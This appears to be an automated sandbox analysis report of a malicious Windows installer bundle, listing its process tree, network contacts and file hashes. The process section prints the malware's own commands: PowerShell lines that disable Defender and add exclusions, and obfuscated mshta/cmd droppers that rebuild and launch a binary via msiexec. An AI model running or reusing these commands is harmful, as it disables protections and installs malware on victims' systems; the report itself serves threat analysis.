| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0625413f2fb.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed067ba5199af5f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed067fa7edd4b875a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06d8092a5ae.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0639114ac9fa.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed068cfd71e196da.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed068a6c101a0e81.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed062a0488e6dd1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06384ea2548.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0625413f2fb.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed062272ee8a02b1746.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06dffacb42ccf1c.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06d8092a5ae.exe
Wed06d8092a5ae.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068cfd71e196da.exe
Wed068cfd71e196da.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe
Wed067fa7edd4b875a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe
Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0639114ac9fa.exe
Wed0639114ac9fa.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062a0488e6dd1.exe
Wed062a0488e6dd1.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06384ea2548.exe
Wed06384ea2548.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe
Wed067ba5199af5f.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3036 -ip 3036
C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp" /SL5="$40210,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe
Wed062272ee8a02b1746.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 588
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe
Wed06dffacb42ccf1c.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0625413f2fb.exe
Wed0625413f2fb.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1124 -ip 1124
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1124 -s 356
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct( "WSCrIpT.ShELl").RuN ("cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF """"=="""" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe"" ) do taskkill /F /im ""%~NXm"" " ,0,true ))
C:\Users\Admin\AppData\Local\Temp\is-GPT0L.tmp\Wed067fa7edd4b875a.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GPT0L.tmp\Wed067fa7edd4b875a.tmp" /SL5="$7004C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe" 05XkvF6f.EXe&&stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF ""=="" for %m In ( "C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe" ) do taskkill /F /im "%~NXm"
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe
05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /im "Wed062272ee8a02b1746.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct( "WSCrIpT.ShELl").RuN ("cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF ""/PttJqbtIGV_gKpayWgLcpQuUGXL9h""=="""" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" ) do taskkill /F /im ""%~NXm"" " ,0,true ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" 05XkvF6f.EXe&&stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF "/PttJqbtIGV_gKpayWgLcpQuUGXL9h"=="" for %m In ( "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" ) do taskkill /F /im "%~NXm"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: ClOse ( cReateobJecT( "wScriPT.shEll" ). Run("C:\Windows\system32\cmd.exe /q /C Echo | sEt /P = ""MZ"" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS+ ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n &STart msiexec -y .\M9WDkH25.n " ,0, TrUe))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C Echo | sEt /P = "MZ" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS+ ZSPELY.cNM + OJM3YR.X+ SVnzW.C2+ AmtZY.zXT+ LPME79O.f1+ NytFSko.4 m9WDKH25.n &STart msiexec -y .\M9WDkH25.n
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Echo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>X5W6AA.ZS"
C:\Windows\SysWOW64\msiexec.exe
msiexec -y .\M9WDkH25.n
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv /W2yzwG3qEaGgnRRh4HPtg.0.2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mooorni.xyz | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| NL | 45.133.1.107:80 | | tcp |
| NL | 45.133.1.107:80 | | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| US | 8.8.8.8:53 | 161.74.67.172.in-addr.arpa | udp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | | tcp |
| FR | 51.178.186.149:80 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | 208.5.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| N/A | 127.0.0.1:59052 | | tcp |
| N/A | 127.0.0.1:59054 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 72.84.118.132:8080 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| US | 8.8.8.8:53 | 60.37.61.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| GB | 2.23.210.75:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | www.qxsgxd.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 75.210.23.2.in-addr.arpa | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:2151 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe
| MD5 | 35799316b448a835e4784fbdd26b5648 |
| SHA1 | fc39b78cc7615b4cbc65aff8b4d14d7b1b234cd5 |
| SHA256 | 2a41d70eb106e926765798e9a407e88e49c07099247cd33924d7faa60e3e7ef0 |
| SHA512 | ae2d8b3bccbe0e7820ba6c25d76251c400b40a40fbd610b182ae8ec51154e66670b30cf13a62d06067024e9ffb9447bea6647be312e2c01f0ac6c4ea602a9660 |
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/3036-63-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3036-64-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3036-61-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4788-65-0x000000007390E000-0x000000007390F000-memory.dmp
memory/3036-62-0x0000000064940000-0x0000000064959000-memory.dmp
memory/4404-67-0x0000000073900000-0x00000000740B0000-memory.dmp
memory/4788-76-0x0000000073900000-0x00000000740B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06384ea2548.exe
| MD5 | bdbbf4f034c9f43e4ab00002eb78b990 |
| SHA1 | 99c655c40434d634691ea1d189b5883f34890179 |
| SHA256 | 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae |
| SHA512 | dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec |
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062a0488e6dd1.exe
| MD5 | c950dfa870dc50ce6e1e2fcaeb362de4 |
| SHA1 | fc1fb7285afa8d17010134680244a19f9da847a1 |
| SHA256 | b7fd0c0227a445847a051fe986bc517e2b136682d98dbe5349e2bc75e0e9e4ec |
| SHA512 | 4117875063173b5767b98300d493e2aee310a76651411ceb2f34588ae5785a0893979699c10e07d0f52d84442db6967b7155875bc7ef738a8e2c49fa70acd1f2 |
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe
| MD5 | 363f9dd72b0edd7f0188224fb3aee0e2 |
| SHA1 | 2ee4327240df78e318937bc967799fb3b846602e |
| SHA256 | e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167 |
| SHA512 | 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_imqtk5wf.gp2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe
| MD5 | a4bf9671a96119f7081621c2f2e8807d |
| SHA1 | 47f50ae20bfa8b277f8c8c1963613d3f4c364b94 |
| SHA256 | d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7 |
| SHA512 | f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a |
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068cfd71e196da.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
memory/1628-112-0x0000000000170000-0x00000000001E0000-memory.dmp
memory/2556-117-0x0000000000BF0000-0x0000000000BF8000-memory.dmp
memory/4788-119-0x0000000073900000-0x00000000740B0000-memory.dmp
memory/2864-121-0x00000000009C0000-0x0000000000A30000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
memory/1628-120-0x0000000004990000-0x00000000049AE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe
| MD5 | cf1ef22fba3b8080deab8dd3ec2dbe79 |
| SHA1 | 62c57835497002d7f760fabb77969281b4ccf3e0 |
| SHA256 | 0826cf8b1478cc5c892d724e30c9d69a0fd765780f916bb0943d73f3cd3866e0 |
| SHA512 | 7a997cbbbdccc75a624ee9f67632024479fdb7a1588c462479c0d4b967373290640bd6b98d08f633d5e71d026faf5343de1d3a61c125e1a04d5ea518275a9e1f |
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0625413f2fb.exe
| MD5 | 69c4678681165376014646030a4fe7e4 |
| SHA1 | fb110dad415ac036c828b51c38debd34045aa0f3 |
| SHA256 | 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77 |
| SHA512 | 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c |
memory/3904-139-0x0000000000890000-0x00000000008A6000-memory.dmp
memory/3904-140-0x0000000001150000-0x0000000001156000-memory.dmp
memory/1628-137-0x00000000050B0000-0x0000000005654000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-KIN1D.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/4788-144-0x0000000005A60000-0x0000000005A7E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
memory/8-148-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2812-147-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2964-151-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4788-146-0x0000000005C90000-0x0000000005CDC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe
| MD5 | 508251b34a5ea5271e6c8d365b3623d2 |
| SHA1 | a6f057ba3154fca2a2000cbb7ee9c171c682a8ac |
| SHA256 | a111e371822094423c652cef67b75663d97e7d7a18c33213d745a1f2075d210f |
| SHA512 | 981e33ee2c1d699304165d7d96af3de99509b7dc0ce6f7a3e49c763f58ae4227f1d60056997adc366de9203d86d469de3062542b2ba147303848d6e4d26bf170 |
memory/1628-118-0x00000000049F0000-0x0000000004A66000-memory.dmp
memory/4404-116-0x0000000073900000-0x00000000740B0000-memory.dmp
memory/2964-109-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0639114ac9fa.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
memory/4788-104-0x0000000005600000-0x0000000005954000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06d8092a5ae.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
memory/4404-89-0x0000000073900000-0x00000000740B0000-memory.dmp
memory/4788-80-0x0000000005590000-0x00000000055F6000-memory.dmp
memory/4788-78-0x0000000005380000-0x00000000053A2000-memory.dmp
memory/4788-79-0x0000000005520000-0x0000000005586000-memory.dmp
memory/4788-68-0x0000000004CE0000-0x0000000005308000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-N4BAF.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/3036-173-0x0000000064940000-0x0000000064959000-memory.dmp
